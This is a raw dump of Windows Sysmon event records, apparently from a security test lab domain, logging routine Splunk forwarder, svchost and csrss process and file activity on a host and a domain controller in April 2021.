11241100x80000000000000001606072Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:09.578{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606071Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:09.578{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA8BA27924D911D77CC891BF58227721,SHA256=76A9757137C4B5ED8CEFEF79D64DE7442C2DEDEE5DA86BC20594F5D2DBC511F3falsefalse - insufficient disk space 10341000x80000000000000001095064Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.495{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095063Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.495{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095086Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.995{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F0FC93AA8BCE1ED63324C48DCCB300,SHA256=DB0B1007061D4240EB9D420109DCC0D0FA6A4B4112E686263EB7035E75614980,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095085Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.994{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC349ED729F5A06D756F5ADA5C48DA76,SHA256=5F18D8769EEF1B53837106FB6FB491D06D44DD4787DDB14DF6B75D47CDB98060,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606074Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:10.797{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606073Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:10.797{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DCB212847CFD062AA02CB6A01F70F1D,SHA256=BA900A8A42ADB46E9569B93CB1741326C874802270C95EDE823B85EBA4E150EBfalsefalse - insufficient disk space 10341000x80000000000000001095084Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.656{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095083Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095082Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095081Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095080Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095079Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818A-607D-0500-00000000BA01}408424C:\Windows\system32\csrss.exe{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095078Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.653{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095077Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.653{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001095076Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.496{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095075Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.496{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095074Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.124{761B69BB-7A71-6080-955F-00000000BA01}63403520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606080Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.884{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606079Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.884{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B25206418ABC6C71AD1520DC772A506,SHA256=8C8CB0FCCCE9424230318CC999388A42BBAEE9A66538250B2FC0F07C137BD483falsefalse - insufficient disk space 10341000x80000000000000001095097Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.496{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095096Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.496{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095095Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.453{761B69BB-7A73-6080-975F-00000000BA01}24606908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095094Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.321{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A73-6080-975F-00000000BA01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095093Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.319{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095092Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.319{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095091Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.318{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095090Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.318{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095089Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.318{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-7A73-6080-975F-00000000BA01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095088Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.318{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A73-6080-975F-00000000BA01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095087Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.317{761B69BB-7A73-6080-975F-00000000BA01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000001606078Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.129{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606077Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.129{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03A08DBB8775290273C26059BFF42C47,SHA256=1A5018D494064382AD4291719A90F3D48941AAA4902A013D1C7AF8FF8D076DDAfalsefalse - insufficient disk space 11241100x80000000000000001606076Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.129{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606075Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.129{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FB4D18D5B6D747CF98FC3998CBF4C46,SHA256=F48EAE814EF2C169914B730A3EF622690CD6851796E62159CC0C5E18C77C8137falsefalse - insufficient disk space 11241100x80000000000000001606085Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 